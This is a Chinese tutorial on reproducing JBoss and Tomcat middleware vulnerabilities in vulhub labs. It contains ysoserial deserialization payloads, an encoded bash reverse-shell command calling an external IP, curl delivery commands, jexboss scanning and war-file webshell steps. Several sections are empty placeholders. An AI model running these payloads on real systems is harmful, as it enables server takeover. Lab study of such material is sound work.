中间件漏洞利用面详解<\/h1>

1. JBoss 中间件漏洞<\/h2>

1.1 JBoss 反序列化漏洞 (CVE-2017-12149)<\/h3>

漏洞描述<\/strong>：
该漏洞是Java反序列化错误类型，存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化。<\/p>

影响版本<\/strong>：<\/p>

JBoss AS 5.x<\/li>
JBoss AS 6.x<\/li> <\/ul>
环境搭建<\/strong>：<\/p>
svn checkout https:\/\/github.com\/vulhub\/vulhub\/trunk\/jboss\/CVE-2017-12149 <\/span><\/span>cd CVE-2017-12149 <\/span><\/span>docker-compose up -d <\/span><\/span><\/code><\/pre>漏洞复现步骤<\/strong>：<\/p> 访问路由 \/invoker\/readonly<\/code>，确认返回500状态码<\/li> 使用ysoserial生成序列化数据： # 反弹shell命令base64编码<\/span> <\/span><\/span>echo "bash -i &>\/dev\/tcp\/xxx\/xxx <&1"<\/span>|base64 <\/span><\/span> <\/span><\/span># 利用ysoserial的CC5链生成序列化代码<\/span> <\/span><\/span>java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSAmPi9kZXYvdGNwLzE4Mi4xNjAuOS4zNS85OTk5IDwmMQo=}|{base64,-d}|{bash,-i}"<\/span> > poc.ser <\/span><\/span><\/code><\/pre><\/li> 传递序列化数据进行攻击： curl http:\/\/192.168.119.157:8080\/invoker\/readonly --data-binary @poc.ser <\/span><\/span><\/code><\/pre><\/li> <\/ol> 漏洞分析<\/strong>：漏洞存在于http invoker组件的ReadOnlyAccessFilter的doFilter方法中。该方法在没有进行任何安全检查的情况下，将来自客户端的数据流(request.getInputStream())进行了反序列化操作。<\/p> 1.2 JBossMQ反序列化漏洞 (CVE-2017-7504)<\/h3> 漏洞描述<\/strong>： JBoss AS 4.x及之前版本中，JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞。<\/p> 影响版本<\/strong>：<\/p> JBoss 4.x<\/li> <\/ul> 环境搭建<\/strong>：<\/p> svn checkout https:\/\/github.com\/vulhub\/vulhub\/trunk\/jboss\/CVE-2017-7504 <\/span><\/span>cd CVE-2017-7504 <\/span><\/span>docker-compose up -d <\/span><\/span><\/code><\/pre>漏洞复现<\/strong>：<\/p> 生成Payload： java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch \/tmp\/success"<\/span> > 1.ser <\/span><\/span><\/code><\/pre><\/li> 发送Payload： curl http:\/\/your-ip:8080\/jbossmq-httpil\/HTTPServerILServlet --data-binary @1.ser <\/span><\/span><\/code><\/pre><\/li> <\/ol> 1.3 JBoss JMXInvokerServlet 反序列化漏洞<\/h3> 漏洞描述<\/strong>： JBoss在\/invoker\/JMXInvokerServlet<\/code>请求中读取了用户传入的对象，可利用Apache Commons Collections中的Gadget执行任意代码。<\/p> 漏洞利用<\/strong>：<\/p> java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch \/tmp\/success"<\/span> > 1.ser <\/span><\/span>curl http:\/\/your-ip:8080\/invoker\/JMXInvokerServlet --data-binary @1.ser <\/span><\/span><\/code><\/pre>1.4 JBoss利用工具<\/h3> jexboss工具<\/h4> 项目地址<\/strong>：https:\/\/github.com\/joaomatosf\/jexboss<\/p> 安装<\/strong>：<\/p> PATH=<\/span>$PATH:C:\P<\/span>ython27\ <\/span><\/span><\/span><\/span>PATH=<\/span>$PATH:C:\P<\/span>ython27\S<\/span>cripts <\/span><\/span>git clone https:\/\/github.com\/joaomatosf\/jexboss.git <\/span><\/span>cd jexboss <\/span><\/span>pip install -r requires.txt <\/span><\/span><\/code><\/pre>使用方式<\/strong>：<\/p> 扫描模式： python jexboss.py -mode auto-scan -network 192.168.119.0\/24 -ports 8080<\/span> -results results.txt <\/span><\/span><\/code><\/pre><\/li> 定点利用： python2 jexboss.py -u http:\/\/192.168.119.157:8080\/ <\/span><\/span><\/code><\/pre><\/li> <\/ol> JbossScan工具<\/h4> 使用方法<\/strong>：<\/p> 将目标URL放入target.txt中<\/li> 执行： python .\j<\/span>bossScan.py <\/span><\/span><\/code><\/pre><\/li> <\/ol> 2. Tomcat 中间件漏洞<\/h2> 2.1 Tomcat部署war包后门<\/h3> 前提条件<\/strong>：能够进入Tomcat管理后台<\/p> 步骤<\/strong>：<\/p> 准备恶意webshell（JSP文件）<\/li> 打包成war包： jar -cvf test.war * <\/span><\/span><\/code><\/pre><\/li> 通过Tomcat管理界面上传war包<\/li> <\/ol> 2.2 Tomcat任意文件读取漏洞 (CVE-2020-1938)<\/h3> 影响版本<\/strong>：<\/p> Apache Tomcat 9.0.0.M1 到9.0.0.30<\/li> Apache Tomcat 8.5.0 到8.5.50<\/li> Apache Tomcat 7.0.0 到7.0.99<\/li> <\/ul> 利用工具<\/strong>：<\/p> 利用脚本：https:\/\/github.com\/zhzyker\/exphub\/blob\/master\/tomcat\/cve-2020-1938_exp.py<\/li> <\/ul> 3. 其他中间件漏洞<\/h2> 3.1 Weblogic<\/h3> （原文中未详细描述，可补充）<\/p> 3.2 Websphere<\/h3> （原文中未详细描述，可补充）<\/p> 3.3 Apache<\/h3> （原文中未详细描述，可补充）<\/p> 3.4 Nginx<\/h3> （原文中未详细描述，可补充）<\/p> 3.5 IIS<\/h3> （原文中未详细描述，可补充）<\/p> 4. 防御建议<\/h2> 及时更新中间件到最新版本<\/li> 关闭不必要的服务和端口<\/li> 对管理后台实施强认证措施<\/li> 监控和限制反序列化操作<\/li> 使用Web应用防火墙(WAF)防护已知漏洞攻击<\/li> <\/ol> 5. 总结<\/h2> 本文详细介绍了JBoss和Tomcat中间件的多个高危漏洞及其利用方法，包括反序列化漏洞、文件读取漏洞等。这些漏洞大多由于不安全的配置或代码实现导致，攻击者可以利用这些漏洞获取服务器权限。管理员应定期检查中间件安全配置，及时修补已知漏洞。<\/p>